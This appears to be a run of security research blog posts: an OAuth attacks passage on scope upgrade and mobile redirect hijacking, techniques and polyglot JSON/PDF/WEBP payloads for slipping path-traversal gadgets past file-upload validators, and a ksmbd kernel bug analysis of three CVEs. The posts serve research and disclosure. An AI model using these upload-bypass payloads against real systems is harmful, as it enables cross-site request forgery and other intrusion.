With the Authorization Code Grant type, the user’s data is requested and sent via secure server-to-server communication.

If the Authorization Server accepts and implicitly trusts a scope parameter sent in the Access Token Request (Note this parameter is not specified in the RFC for the Access Token Request in the Authorization Code Flow), a malicious application could try to upgrade the scope of Authorization Codes retrieved from user callbacks by sending a higher privileged scope in the Access Token Request.

Once the Access Token is generated, the Resource Server must verify the Access Token for every request. This verification depends on the Access Token format, the commonly used ones are the following:

JWT Access Token: With this kind of access token, the Resource Server only needs to check the JWT signature and then retrieve the data included in the JWT (client_id, scope, etc.)
Random String Access Token: Since this kind of token does not include any additional information in them, the Resource Server needs to retrieve the token information from the Authorization Server.

Mitigation

Following the RFC guidelines, the scope parameter should not be sent in the Access Token Request in the Authorization Code flow, although it can be specified in other flows such as the Resource Owner Password Credentials Grant.

The Authorization Server should either ignore the scope parameter or verify it matches the previous scope provided in the Authorization Request.

References

https://datatracker.ietf.org/doc/html/rfc6749#section-3.3

Redirect Scheme Hijacking

When the need to use OAuth on mobile arises, the mobile application takes the role of OAuth User Agents. In order for them to be able to receive the redirect with Authorization Code developers often rely on the mechanism of custom schemes. However, multiple applications can register given scheme on a given device. This breaks OAuth’s assumption that the Client is the only one to control the configured redirect_uri and may lead to Authorization Code takeover in case a malicious app is installed in victim’s devices.

Android Intent URIs have the following structure:

<scheme>://<host>:<port>[<path>|<pathPrefix>|<pathPattern>|<pathAdvancedPattern>|<pathSuffix>]

So for instance the following URI com.example.app://oauth depicts an Intent with scheme=com.example.app and host=oauth. In order to receive these Intents an Android application would need to export an Activity similar to the following:

    <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:host="oauth" android:scheme="=com.example.app"/>
    </intent-filter>

Android system is pretty lenient when it comes to defining Intent Filters. The less filter details, the wider net and more potential URIs caught. So for instance if only scheme is provided, all Intents for this scheme will be caught, regardless of there host, path, etc.

If there are more than one applications that can potentially catch given Intent, they system will let the user decide which to use, which means a redirect takeover would require user interaction. However with the above knowledge it is possible to try and create bypasses, depending on how the legitimate application’s filter has been created. Paradoxically, the more specific original developers were, the easier it is to craft a bypass and take over the redirect without user interaction. In detail, Ostorlab has created the following flowchart to quickly assess whether it is possible:

Recommendation

For situations where the Explicit Authorization Code Flow is not viable, because the Client cannot be trusted to securely store the Client Secret, Authorization Code Flow with Proof Key for Code Exchange (PKCE) has been created. We recommend utilizing this flow for authorizing mobile applications.

Additionally, to restore the trust relation between the Authorization Server and redirect_uri target, it is recommended to use Android’s Verifiable Links and iOS’s Associated Domains mechanisms.

In short, Android’s announced autoVerify property for Intent Filters. In detail, developers can create an Intent Filter similar to the following:

<intent-filter android:autoVerify="true">
  <action android:name="android.intent.action.VIEW" />
  <category android:name="android.intent.category.DEFAULT" />
  <category android:name="android.intent.category.BROWSABLE" />
  <data android:scheme="http" />
  <data android:scheme="https" />
  <data android:host="www.example.com" />
</intent-filter>

When the Intent Filter is defined in the above way, the Android system verifies whether the defined host is actually owned by the creator of the app. In detail, the host needs to publish a /.well-known/assetlinks.json file to the associated domain, listing the given APK, in order for it to be allowed to handle given links:

[{
  "relation": ["delegate_permission/common.handle_all_urls"],
  "target": {
    "namespace": "android_app",
    "package_name": "com.example",
    "sha256_cert_fingerprints":
    ["14:6D:E9:83:C5:73:06:50:D8:EE:B9:95:2F:34:FC:64:16:A0:83:42:E6:1D:BE:A8:8A:04:96:B2:3F:CF:44:E5"]
  }
}]

Thanks to this design, rogue applications cannot register their own Intent Filter for the already claimed host, although this would only work if the handled scheme is not custom. For instance, if the application handles the com.example.app:// scheme there is no way to give additional priority and the user will have to choose between the apps that implement a handler for that specific scheme.

References

Summary

This article provides a comprehensive list of attacks and defenses for the OAuth protocol. Along with the post itself, we are releasing a comprehensive cheat-sheet for developers and testers.

Download the OAuth Security Cheat Sheet: Doyensec_OAuth_CheatSheet.pdf.

As this field is subject to frequent new research and development, we do not claim full knowledge of all intricacies. If you have suggestions on how to improve this summary, feel free to contact the authors. We would be glad to update this blog post so that it can be considered as a comprehensive resource for anyone interested in the topic.

Bypassing File Upload Restrictions To Exploit Client-Side Path Traversal

2025-01-09T00:00:00+01:00

In my previous blog post, I demonstrated how a JSON file could be used as a gadget for Client-Side Path Traversal (CSPT) to perform Cross-Site Request Forgery (CSRF). That example was straightforward because no file upload restriction was enforced. However, real-world applications often impose restrictions on file uploads to ensure security.

In this post, we’ll explore how to bypass some of these mechanisms to achieve the same goal. We’ll cover common file validation methods and how they can be subverted.

Constraint

In most scenarios, the gadget file will be parsed in the front-end using JSON.parse. It means that our file must be a valid input for JSON.parse. If we look at the V8 implementation. A valid JSON input is :

a string
a number
true
false
null
an array
an object

The parser skips starting WHITESPACE characters such as :

’ ‘
‘\t’
‘\r’
‘\n’

Also, control characters and double quotes inside a JSON object (key or value) will break the JSON structure and must be escaped.

Our gadget file must follow these restrictions to be parsed as JSON.

Different applications validate files using libraries or tools designed to detect the file’s MIME type, file structure or magic bytes. By creatively crafting files that meet these conditions, we can fool these validations and bypass the restrictions.

Let’s explore how various file upload mechanisms can be bypassed to maintain valid JSON payloads for CSPT while satisfying file format requirements, such as PDFs or images.

Bypassing PDF Checks To Upload a JSON File

A basic check in many upload mechanisms involves verifying the file’s MIME type. This is often done using the Content-Type header or by inspecting the file itself. However, these checks can often be bypassed by manipulating the file’s structure or headers.

Bypassing mmmagic Validation

The mmmagic library is commonly used in Node.js applications to detect file types based on the Magic database. A PDF file can be verified with the following code:

async function checkMMMagic(binaryFile) {
    var magic = new Magic(mmm.MAGIC_MIME_TYPE);

    const detectAsync = (binaryFile) => {
        return new Promise((resolve, reject) => {
            magic.detect.call(magic, binaryFile, (error, result) => {
                if (error) {
                    reject(error);
                } else {
                    resolve(result);
                }
            });
        });
    };

    const result = await detectAsync(binaryFile);

    const isValid = (result === 'application/pdf')
    if (!isValid) {
        throw new Error('mmmagic: File is not a PDF : ' + result);
    }
}

Technique:

The library checks for the %PDF magic bytes. It uses the Magic detection rules defined here. However, according to the PDF specification, this magic number doesn’t need to be at the very beginning of the file.

We can wrap a PDF header within the first 1024 bytes of a JSON object. It will be a valid JSON file considered as a PDF by the library. This allows us to fool the library into accepting the upload as a valid PDF while still allowing it to be parsed as JSON by the browser. Here’s an example:

{ "id" : "../CSPT_PAYLOAD", "%PDF": "1.4" }

As long as the %PDF header appears within the first 1024 bytes, the mmmagic library will accept this file as a PDF, but it can still be parsed as JSON on the client side.

Bypassing pdflib Validation

The pdflib library requires more than just the %PDF header. It can be used to validate the overall PDF structure.

async function checkPdfLib(binaryFile) {
    let pdfDoc = null
    try {
        pdfDoc = await PDFDocument.load(binaryFile);
    } catch (error) {
        throw new Error('pdflib: Not a valid PDF')
    }

    if (pdfDoc.getPageCount() == 0) {
        throw new Error('pdflib: PDF doesn\'t have a page');
    }
}

Technique:

To bypass this, we can create a valid PDF (for pdflib) that still conforms to the JSON structure required for CSPT. The trick is to replace %0A (line feed) characters between PDF object definitions with space %20. This allows the file to be recognized as a valid PDF for pdflib but still be interpretable as JSON. The xref table doesn’t need to be fixed because our goal is not to display the PDF, but to pass the upload validation.

Here’s an example:

{"_id":"../../../../CSPT?","bypass":"%PDF-1.3 1 0 obj <<   /Pages 2 0 R   /Type /Catalog >> endobj 2 0 obj <<   /Count 1   /Kids [     3 0 R   ]   /Type /Pages >> endobj 3 0 obj <<   /Contents 4 0 R   /MediaBox [ 0 0 200 200 ]   /Parent 2 0 R   /Resources <<     /Font << /F1 5 0 R >>   >>   /Type /Page >> endobj 4 0 obj <<   /Length 50 >> stream BT   /F1 10 Tf   20 100 Td   (CSPT) Tj ET endstream endobj 5 0 obj <<   /Type /Font   /Subtype /Type1   /BaseFont /Helvetica >> endobj xref 0 6 0000000000 65535 f 0000000009 00000 n 0000000062 00000 n 0000000133 00000 n 0000000277 00000 n 0000000370 00000 n trailer <<   /Size 6   /Root 1 0 R >> startxref 447 %%EOF "}

While this PDF will not render in recent PDF viewers, it will be readable by pdflib and pass the file upload checks.

Bypassing file Command Validation

In some environments, the file command or a library based on file is used to detect file types.

async function checkFileCommand(binaryFile) {
    //Write a temporary file
    const tmpobj = tmp.fileSync();
    fs.writeSync(tmpobj.fd, binaryFile);
    fs.closeSync(tmpobj.fd);

    // Exec file command
    output = execFileSync('file', ["-b", "--mime-type", tmpobj.name])

    const isValid = (output.toString() === 'application/pdf\n')
    if (!isValid) {
        throw new Error(`content - type: File is not a PDF : ${output}`);
    }
    tmpobj.removeCallback();

}

Technique:

The difference with mmmagic is that before checking the magic bytes, it tries to parse the file as JSON. If it succeed, the file is considered to be JSON and no other checks will be perform. So we can’t use the same trick as mmmagic. However, the file command has a known limit on the size of files it can process. This is an extract of the man file command.

     -P, --parameter name=value
             Set various parameter limits.

            Name         Default    Explanation
            bytes        1048576    max number of bytes to read from file
            elf_notes    256        max ELF notes processed
            elf_phnum    2048       max ELF program sections processed
            elf_shnum    32768      max ELF sections processed
            encoding     65536      max number of bytes for encoding evaluation
            indir        50         recursion limit for indirect magic
            name         60         use count limit for name/use magic
            regex        8192       length limit for regex searches

We can see a limit on the number of bytes to read. We can exploit this limit by padding the file with whitespace characters (such as spaces or tabs) until the file exceeds the parsing limit. Once the limit is reached, the file_is_json function will fail, and the file will be classified as a different file type (e.g., a PDF).

For example, we can create a file like this:

{
  "_id": "../../../../CSPT?",
  "bypass": "%PDF-1.3 1 0 obj <<   /Pages 2 0 R   /Type /Catalog >> endobj 2 0 obj <<   /Count 1   /Kids [     3 0 R   ]   /Type /Pages >> endobj 3 0 obj <<   /Contents 4 0 R   /MediaBox [ 0 0 200 200 ]   /Parent 2 0 R   /Resources <<     /Font << /F1 5 0 R >>   >>   /Type /Page >> endobj 4 0 obj <<   /Length 50 >> stream BT   /F1 10 Tf   20 100 Td   (CSPT) Tj ET endstream endobj 5 0 obj <<   /Type /Font   /Subtype /Type1   /BaseFont /Helvetica >> endobj xref 0 6 0000000000 65535 f 0000000009 00000 n 0000000062 00000 n 0000000133 00000 n 0000000277 00000 n 0000000370 00000 n trailer <<   /Size 6   /Root 1 0 R >> startxref 447 %%EOF <..A LOT OF SPACES..> "
}

When uploaded, the file command will be unable to parse this large JSON structure, causing it to fall back to normal file detection and to treat the file as a PDF.

Bypassing Image Upload file-type Restriction Using the WEBP Format

Image uploads often use libraries like file-type to validate file formats. The following code tries ensure that the uploaded file is an image.

const checkFileType = async (binary) => {
    const { fileTypeFromBuffer } = await fileType();

    const type = await fileTypeFromBuffer(binary);
    const result = type.mime;

    const isValid = result.startsWith('image/');
    if (!isValid) {
        throw new Error('file-type: File is not an image : ' + result);
    }
};

Technique:

Sometimes, these libraries check for specific magic numbers at a predefined offset. In this example, file-type checks if the magic bytes are present at offset 8:

https://github.com/sindresorhus/file-type/blob/v19.6.0/core.js#L358C1-L363C1

if (this.checkString('WEBP', {offset: 8})) {
  return {
    ext: 'webp',
    mime: 'image/webp',
  };
}

As we have control over the starting bytes, we can build a valid JSON file. We can craft a JSON object that places the magic bytes (WEBP) at the correct offset, allowing the file to pass validation as an image while still being a valid JSON object. Here’s an example:

{"aaa":"WEBP","_id":"../../../../CSPT?"}

This file will pass the file-type check for images, while still containing JSON data that can be used for CSPT.

Conclusion

Bypassing file-upload restrictions is not new but we wanted to share some methods we used in past years to upload JSON gadgets when file-upload restrictions are implemented. We used them in order to perform CSPT2CSRF or any other exploits (XSS, etc.) but they can be applied in other contexts too. Don’t hesitate to dig into third-party source code in order to understand how it works.

All these examples and files have been included in our CSPTPlayground. The playground doesn’t only include CSPT2CSRF but also other examples such as a JSONP gadget or Open Redirect. This was built based on feedback received by Isira Adithya (@isira_adithya) and Justin Gardner (@Rhynorater). Thank you so much!

More Information

If you would like to learn more about our other research, check out our blog, follow us on X (@doyensec) or feel free to contact us at info@doyensec.com for more information on how we can help your organization “Build with Security”.

ksmbd vulnerability research

2025-01-07T00:00:00+01:00

Introduction

At Doyensec, we decided to perform a vulnerability research activity on the SMB3 Kernel Server (ksmbd), a component of the Linux kernel. Initially, it was enabled as an experimental feature, but in the kernel version 6.6, the experimental flag was removed, and it remains stable.

Ksmbd splits tasks to optimize performance, handling critical file operations in kernel space and non-performance-related tasks, such as DCE/RPC and user account management, in user space via ksmbd.mountd. The server uses a multi-threaded architecture to efficiently process SMB requests in parallel, leveraging kernel worker threads for scalability and user-space integration for configuration and RPC handling.

Ksmbd is not enabled by default, but it is a great target for learning the SMB protocol while also exploring Linux internals, such as networking, memory management, and threading.

The ksmbd kernel component binds directly to port 445 to handle SMB traffic. Communication between the kernel and the ksmbd.mountd user-space process occurs via the Netlink interface, a socket-based mechanism for kernel-to-user space communication in Linux. We focused on targeting the kernel directly due to its direct reachability, even though ksmbd.mountd operates with root privileges.

The illustrative diagram of the architecture can be found here in the mailing list and is displayed below:

               |--- ...
       --------|--- ksmbd/3 - Client 3
       |-------|--- ksmbd/2 - Client 2
       |       |         ____________________________________________________
       |       |        |- Client 1                                          |
<--- Socket ---|--- ksmbd/1   <<= Authentication : NTLM/NTLM2, Kerberos      |
       |       |      | |     <<= SMB engine : SMB2, SMB2.1, SMB3, SMB3.0.2, |
       |       |      | |                SMB3.1.1                            |
       |       |      | |____________________________________________________|
       |       |      |
       |       |      |--- VFS --- Local Filesystem
       |       |
KERNEL |--- ksmbd/0(forker kthread)
---------------||---------------------------------------------------------------
USER           ||
               || communication using NETLINK
               ||  ______________________________________________
               || |                                              |
        ksmbd.mountd <<= DCE/RPC(srvsvc, wkssvc, samr, lsarpc)   |
               ^  |  <<= configure shares setting, user accounts |
               |  |______________________________________________|
               |
               |------ smb.conf(config file)
               |
               |------ ksmbdpwd.db(user account/password file)
                            ^
  ksmbd.adduser ------------|

Multiple studies on this topic have been published, including those by Thalium and pwning.tech. The latter contains a detailed explanation on how to approach fuzzing from scratch using syzkaller. Although the article’s grammar is quite simple, it provides an excellent starting point for further improvements we built upon.

We began by intercepting and analyzing legitimate communication using a standard SMB client. This allowed us to extend the syzkaller grammar to include additional commands implemented in smb2pdu.c.

During fuzzing, we encountered several challenges, one of which was addressed in the pwning.tech article. Initially, we needed to tag packets to identify the syzkaller instance (procid). This tagging was required only for the first packet, as subsequent packets shared the same socket connection. To solve this, we modified the first (negotiation) request by appending 8 bytes representing the syzkaller instance number. Afterward, we sent subsequent packets without tagging.

Another limitation of syzkaller is its inability to use malloc() for dynamic memory allocation, complicating the implementation of authentication in pseudo syscalls. To work around this, we patched the relevant authentication (NTLMv2) and packet signature verification checks, allowing us to bypass negotiation and session setup without valid signatures. This enabled the invocation of additional commands, such as ioctl processing logic.

To create more diverse and valid test cases, we initially extracted communication using strace, or manually crafted packets. For this, we used Kaitai Struct, either through its web interface or visualizer. When a packet was rejected by the kernel, Kaitai allowed us to quickly identify and resolve the issue.

During our research, we identified multiple security issues, three of which are described in this post. These vulnerabilities share a common trait - they can be exploited without authentication during the session setup phase. Exploiting them requires a basic understanding of the communication process.

Communication

During KSMBD initialization (whether built into the kernel or as an external module), the startup function create_socket() is called to listen for incoming traffic:

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/transport_tcp.c#L484
	ret = kernel_listen(ksmbd_socket, KSMBD_SOCKET_BACKLOG);
	if (ret) {
		pr_err("Port listen() error: %d\n", ret);
		goto out_error;
	}

The actual data handling occurs in the ksmbd_tcp_new_connection() function and the spawned per-connection threads (ksmbd:%u). This function also allocates the struct ksmbd_conn, representing the connection:

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/transport_tcp.c#L203
static int ksmbd_tcp_new_connection(struct socket *client_sk)
{
	// ..
	handler = kthread_run(ksmbd_conn_handler_loop,
			      KSMBD_TRANS(t)->conn,
			      "ksmbd:%u",
			      ksmbd_tcp_get_port(csin));
	// ..
}

The ksmbd_conn_handler_loop is crucial as it handles reading, validating and processing SMB protocol messages (PDUs). In the case where there are no errors, it calls one of the more specific processing functions:

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/connection.c#L395
		if (default_conn_ops.process_fn(conn)) {
			pr_err("Cannot handle request\n");
			break;
		}

The processing function adds a SMB request to the worker thread queue:

// ksmbd_server_process_request
static int ksmbd_server_process_request(struct ksmbd_conn *conn)
{
	return queue_ksmbd_work(conn);
}

This occurs inside queue_ksmbd_work, which allocates the ksmbd_work structure that wraps the session, connection, and all SMB-related data, while also performing early initialization.

In the Linux kernel, adding a work item to a workqueue requires initializing it with the INIT_WORK() macro, which links the item to a callback function to be executed when processed. Here, this is performed as follows:

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/server.c#L312
	INIT_WORK(&work->work, handle_ksmbd_work);
	ksmbd_queue_work(work);

We are now close to processing SMB PDU operations. The final step is for handle_ksmbd_work to extract the command number from the request

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/server.c#L213
rc = __process_request(work, conn, &command);

and execute the associated command handler.

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/server.c#L108
static int __process_request(struct ksmbd_work *work, struct ksmbd_conn *conn,
			     u16 *cmd)
{
	// ..
	command = conn->ops->get_cmd_val(work);
	*cmd = command;
	// ..

	cmds = &conn->cmds[command];
	// ..
	ret = cmds->proc(work);

Here is the list of the procedures that are invoked:

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/smb2ops.c#L171
	[SMB2_NEGOTIATE_HE]	=	{ .proc = smb2_negotiate_request, },
	[SMB2_SESSION_SETUP_HE] =	{ .proc = smb2_sess_setup, },
	[SMB2_TREE_CONNECT_HE]  =	{ .proc = smb2_tree_connect,},
	[SMB2_TREE_DISCONNECT_HE]  =	{ .proc = smb2_tree_disconnect,},
	[SMB2_LOGOFF_HE]	=	{ .proc = smb2_session_logoff,},
	[SMB2_CREATE_HE]	=	{ .proc = smb2_open},
	[SMB2_QUERY_INFO_HE]	=	{ .proc = smb2_query_info},
	[SMB2_QUERY_DIRECTORY_HE] =	{ .proc = smb2_query_dir},
	[SMB2_CLOSE_HE]		=	{ .proc = smb2_close},
	[SMB2_ECHO_HE]		=	{ .proc = smb2_echo},
	[SMB2_SET_INFO_HE]      =       { .proc = smb2_set_info},
	[SMB2_READ_HE]		=	{ .proc = smb2_read},
	[SMB2_WRITE_HE]		=	{ .proc = smb2_write},
	[SMB2_FLUSH_HE]		=	{ .proc = smb2_flush},
	[SMB2_CANCEL_HE]	=	{ .proc = smb2_cancel},
	[SMB2_LOCK_HE]		=	{ .proc = smb2_lock},
	[SMB2_IOCTL_HE]		=	{ .proc = smb2_ioctl},
	[SMB2_OPLOCK_BREAK_HE]	=	{ .proc = smb2_oplock_break},
	[SMB2_CHANGE_NOTIFY_HE]	=	{ .proc = smb2_notify},

After explaining how the PDU function is reached, we can move on to discussing the resulting bugs.

CVE-2024-50286

The vulnerability stems from improper synchronization in the management of the sessions_table in ksmbd. Specifically, the code lacks a sessions_table_lock to protect concurrent access during both session expiration and session registration. This issue introduces a race condition, where multiple threads can access and modify the sessions_table simultaneously, leading to a Use-After-Free (UAF) in cache kmalloc-512.

The sessions_table is implemented as a hash table and it stores all active SMB sessions for a connection, using session identifier (sess->id) as the key.

During the session registration, the following flow happens:

A new session is created for the connection.
Before registering the session, the worker thread calls ksmbd_expire_session to remove expired sessions to avoids stale sessions consuming resources.
Once cleanup is complete, the new session is added to the connection’s session list.

Operations on this table, such as adding (hash_add) and removing sessions (hash_del), lack proper synchronization, creating a race condition.

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/smb2pdu.c#L1663
int smb2_sess_setup(struct ksmbd_work *work)
{
	// .. 
	ksmbd_conn_lock(conn);
	if (!req->hdr.SessionId) {
		sess = ksmbd_smb2_session_create(); // [1]
		if (!sess) {
			rc = -ENOMEM;
			goto out_err;
		}
		rsp->hdr.SessionId = cpu_to_le64(sess->id);
		rc = ksmbd_session_register(conn, sess); // [2]
		if (rc)
			goto out_err;

		conn->binding = false;

At [1], the session is created, by allocating the sess object:

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/mgmt/user_session.c#L381
	sess = kzalloc(sizeof(struct ksmbd_session), GFP_KERNEL);
	if (!sess)
		return NULL;

At this point, during a larger number of simultaneous connections, some sessions can expire. As the ksmbd_session_register at [2] is invoked, it calls ksmbd_expire_session [3]:

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/mgmt/user_session.c#L192
int ksmbd_session_register(struct ksmbd_conn *conn,
			   struct ksmbd_session *sess)
{
	sess->dialect = conn->dialect;
	memcpy(sess->ClientGUID, conn->ClientGUID, SMB2_CLIENT_GUID_SIZE);
	ksmbd_expire_session(conn); // [3]
	return xa_err(xa_store(&conn->sessions, sess->id, sess, GFP_KERNEL));
}

Since there is no table locking implemented, the expired sess object could be removed from the table ([4]) and deallocated ([5]):

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/mgmt/user_session.c#L173
static void ksmbd_expire_session(struct ksmbd_conn *conn)
{
	unsigned long id;
	struct ksmbd_session *sess;

	down_write(&conn->session_lock);
	xa_for_each(&conn->sessions, id, sess) {
		if (atomic_read(&sess->refcnt) == 0 &&
		    (sess->state != SMB2_SESSION_VALID ||
		     time_after(jiffies,
			       sess->last_active + SMB2_SESSION_TIMEOUT))) {
			xa_erase(&conn->sessions, sess->id);
			hash_del(&sess->hlist); // [4]
			ksmbd_session_destroy(sess); // [5]
			continue;
		}
	}
	up_write(&conn->session_lock);
}

However, in another thread, the cleanup could be invoked when the connection is terminated in ksmbd_server_terminate_conn by calling ksmbd_sessions_deregister, operating on the same table and without the appropriate lock ([6]):

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/mgmt/user_session.c#L213
void ksmbd_sessions_deregister(struct ksmbd_conn *conn)
{
	struct ksmbd_session *sess;
	unsigned long id;

	down_write(&sessions_table_lock);
	// .. ignored, since the connection is not binding
	up_write(&sessions_table_lock);

	down_write(&conn->session_lock);
	xa_for_each(&conn->sessions, id, sess) {
		unsigned long chann_id;
		struct channel *chann;

		xa_for_each(&sess->ksmbd_chann_list, chann_id, chann) {
			if (chann->conn != conn)
				ksmbd_conn_set_exiting(chann->conn);
		}

		ksmbd_chann_del(conn, sess);
		if (xa_empty(&sess->ksmbd_chann_list)) {
			xa_erase(&conn->sessions, sess->id);
			hash_del(&sess->hlist); // [6] 
			ksmbd_session_destroy(sess);
		}
	}
	up_write(&conn->session_lock);
}

One possible flow is outlined here:

Thread A                         | Thread B
---------------------------------|-----------------------------
ksmbd_session_register           | 
ksmbd_expire_session             |  
                                 | ksmbd_server_terminate_conn
                                 | ksmbd_sessions_deregister
ksmbd_session_destroy(sess)      |   |
    |                            |   |
    hash_del(&sess->hlist);      |   |
    kfree(sess);                 |   |
                                 |   hash_del(&sess->hlist);

When enabling KASAN, the issue was manifested by the following crashes:

BUG: KASAN: slab-use-after-free in __hlist_del include/linux/list.h:990 [inline]
BUG: KASAN: slab-use-after-free in hlist_del_init include/linux/list.h:1016 [inline]
BUG: KASAN: slab-use-after-free in hash_del include/linux/hashtable.h:107 [inline]
BUG: KASAN: slab-use-after-free in ksmbd_sessions_deregister+0x569/0x5f0 fs/smb/server/mgmt/user_session.c:247
Write of size 8 at addr ffff888126050c70 by task ksmbd:51780/39072

BUG: KASAN: slab-use-after-free in hlist_add_head include/linux/list.h:1034 [inline]
BUG: KASAN: slab-use-after-free in __session_create fs/smb/server/mgmt/user_session.c:420 [inline]
BUG: KASAN: slab-use-after-free in ksmbd_smb2_session_create+0x74a/0x750 fs/smb/server/mgmt/user_session.c:432
Write of size 8 at addr ffff88816df5d070 by task kworker/5:2/139

Both issues result in an out-of-bounds (OOB) write at offset 112.

CVE-2024-50283: ksmbd: fix slab-use-after-free in smb3_preauth_hash_rsp

The vulnerability was introduced in the commit 7aa8804c0b, when implementing the reference count for sessions to avoid UAF:

// https://github.com/torvalds/linux/blob/7aa8804c0b67b3cb263a472d17f2cb50d7f1a930/fs/smb/server/server.c
send:
	if (work->sess)
		ksmbd_user_session_put(work->sess);
	if (work->tcon)
		ksmbd_tree_connect_put(work->tcon);
	smb3_preauth_hash_rsp(work); // [8]
	if (work->sess && work->sess->enc && work->encrypted &&
	    conn->ops->encrypt_resp) {
		rc = conn->ops->encrypt_resp(work);
		if (rc < 0)
			conn->ops->set_rsp_status(work, STATUS_DATA_ERROR);
	}

	ksmbd_conn_write(work);

Here, the ksmbd_user_session_put decrements the sess->refcnt and if the value reaches zero, the kernel is permitted to free the sess object ([7]):

// https://github.com/torvalds/linux/blob/7aa8804c0b67b3cb263a472d17f2cb50d7f1a930/fs/smb/server/mgmt/user_session.c#L296
void ksmbd_user_session_put(struct ksmbd_session *sess)
{
	if (!sess)
		return;

	if (atomic_read(&sess->refcnt) <= 0)
		WARN_ON(1);
	else
		atomic_dec(&sess->refcnt); // [7]
}

The smb3_preauth_hash_rsp function ([8]) that follows accesses the sess object without verifying if it has been freed ([9]):

// https://github.com/torvalds/linux/blob/7aa8804c0b67b3cb263a472d17f2cb50d7f1a930/fs/smb/server/smb2pdu.c#L8859
	if (le16_to_cpu(rsp->Command) == SMB2_SESSION_SETUP_HE && sess) {
		__u8 *hash_value;

		if (conn->binding) {
			struct preauth_session *preauth_sess;

			preauth_sess = ksmbd_preauth_session_lookup(conn, sess->id);
			if (!preauth_sess)
				return;
			hash_value = preauth_sess->Preauth_HashValue;
		} else {
			hash_value = sess->Preauth_HashValue; // [9]
			if (!hash_value)
				return;
		}
		ksmbd_gen_preauth_integrity_hash(conn, work->response_buf,
						 hash_value);
	}

This can result in a use-after-free (UAF) condition when accessing the freed object, as detected by KASAN:

BUG: KASAN: slab-use-after-free in smb3_preauth_hash_rsp (fs/smb/server/smb2pdu.c:8875) 
Read of size 8 at addr ffff88812f5c8c38 by task kworker/0:9/308

CVE-2024-50285: ksmbd: check outstanding simultaneous SMB operations

After reporting the bugs and confirming the fix, we identified another issue when sending a large number of packets. Each time queue_ksmbd_work is invoked during a socket connection, it allocates data through ksmbd_alloc_work_struct

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/ksmbd_work.c#L21
struct ksmbd_work *ksmbd_alloc_work_struct(void)
{
	struct ksmbd_work *work = kmem_cache_zalloc(work_cache, GFP_KERNEL);
    // ..
}

In SMB, credits are designed to control the number of requests a client can send. However, the affected code executed before enforcing the credit limits.

After approximately two minutes of sending these packets through a remote socket, the system consistently encountered a kernel panic and restarted:

[  287.957806] Out of memory and no killable processes...
[  287.957813] Kernel panic - not syncing: System is deadlocked on memory
[  287.957824] CPU: 2 UID: 0 PID: 2214 Comm: ksmbd:52086 Tainted: G    B              6.12.0-rc5-00181-g6c52d4da1c74-dirty #26
[  287.957848] Tainted: [B]=BAD_PAGE
[  287.957854] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[  287.957863] Call Trace:
[  287.957869]  <TASK>
[  287.957876] dump_stack_lvl (lib/dump_stack.c:124 (discriminator 1)) 
[  287.957895] panic (kernel/panic.c:354) 
[  287.957913] ? __pfx_panic (kernel/panic.c:288) 
[  287.957932] ? out_of_memory (mm/oom_kill.c:1170) 
[  287.957964] ? out_of_memory (mm/oom_kill.c:1169) 
[  287.957989] out_of_memory (mm/oom_kill.c:74 mm/oom_kill.c:1169) 
[  287.958014] ? mutex_trylock (./arch/x86/include/asm/atomic64_64.h:101 ./include/linux/atomic/atomic-arch-fallback.h:4296 ./include/linux/atomic/atomic-long.h:1482 ./include/linux/atomic/atomic-instrumented.h:4458 kernel/locking/mutex.c:129 kernel/locking/mutex.c:152 kernel/locking/mutex.c:1092) 

The reason was that the ksmbd kept creating threads, and after forking more than 2000 threads, the ksmbd_work_cache depleted available memory.

This could be confirmed by using slabstat or inspecting /proc/slabinfo. The number of active objects steadily increased, eventually exhausting kernel memory and causing the system to restart:

# ps auxww | grep -i ksmbd | wc -l
2069

# head -2 /proc/slabinfo; grep ksmbd_work_cache /proc/slabinfo
slabinfo - version: 2.1
# name            <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab> : tunables <limit> <batchcount> <sharedfactor> : slabdata <active_slabs> <num_slabs> <sharedavail>
ksmbd_work_cache  16999731 16999731    384   21    2 : tunables    0    0    0 : slabdata 809511 809511      0

This issue was not identified by syzkaller but was uncovered through manual testing with the triggering code.

Conclusion

Even though syzkaller identified and triggered two of the vulnerabilities, it failed to generate a reproducer, requiring manual analysis of the crash reports. These issues were accessible without authentication and further improvements in fuzzing are likely to uncover additional bugs either from complex locking mechanisms that are difficult to implement correctly or other factors. Due to time constraints, we did not attempt to create a fully working exploit for the UAF.

References

Unsafe Archive Unpacking: Labs and Semgrep Rules

2024-12-16T00:00:00+01:00

Introduction

During my recent internship with Doyensec, I had the opportunity to research decompression attacks across different programming languages. As the use of archive file formats is widespread in software development, it is crucial for developers to understand the potential security risks involved in handling these files.

The objective of my research was to identify, analyze, and detect vulnerable implementations in several popular programming languages used for web and app development, including Python, Ruby, Swift, Java, PHP, and JavaScript. These languages have libraries for archive decompression that, when used improperly, may potentially lead to vulnerabilities.

To demonstrate the risk of unsafe unpacking, I created proof-of-concept (PoC) code with different vulnerable implementations for each method and each language. My work also focused on safe alternatives for each one of the vulnerable implementations. Additionally, I created a web application to upload and test whether the code used in a specific implementation is safe or not.

To efficiently search for vulnerabilities on larger codebases, I used a popular SAST (Static Application Security Testing) tool - Semgrep. Specifically, I wrote a set of rules to automatically detect those vulnerable implementations which it will make it easier to identify vulnerabilities.

Secure and insecure code, labs and Semgrep rules for all programming languages have been published on https://github.com/doyensec/Unsafe-Unpacking.

Understanding Archive Path Traversal

Extracting an archive (e.g., a ZIP file) usually involves reading all its contents and writing them to the specified extraction path. An archive path traversal aims to extract files to directories that are outside the intended extraction path.

